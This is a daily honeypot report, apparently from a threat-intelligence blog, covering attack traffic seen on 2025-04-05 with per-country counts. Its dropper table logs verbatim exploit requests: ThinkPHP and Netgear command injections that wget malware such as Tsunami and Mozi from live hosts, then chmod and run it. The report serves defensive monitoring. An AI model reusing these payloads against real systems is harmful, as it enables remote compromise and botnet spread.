Skip to main content
  1. Daily-Posts/

Report: 2025-04-05

·622 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-05
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 17 stage 1 IP address(es), linked to 7 dropper URL(s).

There are 23 new requests that have never been observed before (these were added to the monitored request database.).

A total of 2988 requests were recorded during the day, originating from 17 different countries, with a peak of 1048 requests coming from NL.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
SCGermany
USDubai
SEIsrael
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
139.5.0.55GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
204.76.203.18GET /wget HTTP/1.1
92.52.235.131GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
175.183.33.202GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
123.241.105.30GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
61.10.103.203GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
211.143.108.124GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
114.76.203.37GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
217.160.89.196GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://45.137.70.156/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
82.163.187.247GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
110.175.39.203GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
90.198.129.58GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
61.61.62.201GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
51.190.15.243GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
31.170.22.205GET /cgi-bin/live_api.cgi?page=satellite_list&id=&ip=$(cd+/tmp;wget+http://31.170.22.205/dl18;busybox+wget+http://31.170.22.205/dl18;sh+dl18) HTTP/1.1
121.22.35.6GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
119.74.42.105GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1144GET /manifest.json HTTP/1.1
1893GET /x0ox0ox0oxDefault/z0r0.arc HTTP/1.1
1913GET /x0ox0ox0oxDefault/z0r0.sh4 HTTP/1.1
1943GET /x0ox0ox0oxDefault/z0r0.mips HTTP/1.1
1953GET /x0ox0ox0oxDefault/z0r0.m68k HTTP/1.1
1983GET /x0ox0ox0oxDefault/z0r0.x86 HTTP/1.1
2073GET /x0ox0ox0oxDefault/z0r0.arm5 HTTP/1.1
3173GET /x0ox0ox0oxDefault/z0r0.arm6 HTTP/1.1
3183GET /x0ox0ox0oxDefault/z0r0.mpsl HTTP/1.1
5882GET /x0ox0ox0oxDefault/z0r0.ppc HTTP/1.1
5892GET /x0ox0ox0oxDefault/z0r0.arm7 HTTP/1.1
5902GET /x0ox0ox0oxDefault/z0r0.arm HTTP/1.1
5932GET /mailman/listinfo/mailman HTTP/1.1
6191GET http://www.chinaso.com/?0.10760317674236344196592736 HTTP/1.1
6501GET http://www.blackle.com/?0.4020326830433873311558716 HTTP/1.1
6871GET /Nmap/folder/check1743864234 HTTP/1.1
6911GET /NmapUpperCheck1743864234 HTTP/1.1
6991GET /i8Xc HTTP/1.1
7031GET /nmaplowercheck1743864234 HTTP/1.1
7431GET /lh8P HTTP/1.1
7571\x00\x0E8\xA0\xC9o\xFF9d\x9A\xAD\x00\x00\x00\x00\x00
7581\x00\x0E\x08\xA0\xC9o\xFF9d\x9A\xAD\x00\x00\x00\x00\x00
10011GET /users/users/users/users/users/users/users/users/users/login HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
01048NL
1353GB
2265IL
3233US
4184SC
5162CN
6118BG
7101DE
898SE
972HK
1070PL
1147AZ
1232UA
1325FR
1423RU
1518NO
1615LV
1712KR
1810IE
199ZA
208CA
218NG
227TW
237JP
246CH
255BE
265ID
275LT
285TR
295AT
304MA
314VN
323AU
333IN
343IT
353MC
363SG
372BR
382HU
391GH
401RO
411MY
421TH
431PK

Related

Report: 2025-04-04
·1256 words
Repport Daily
Report: 2025-04-03
·1054 words
Repport Daily
Report: 2025-04-02
·576 words
Repport Daily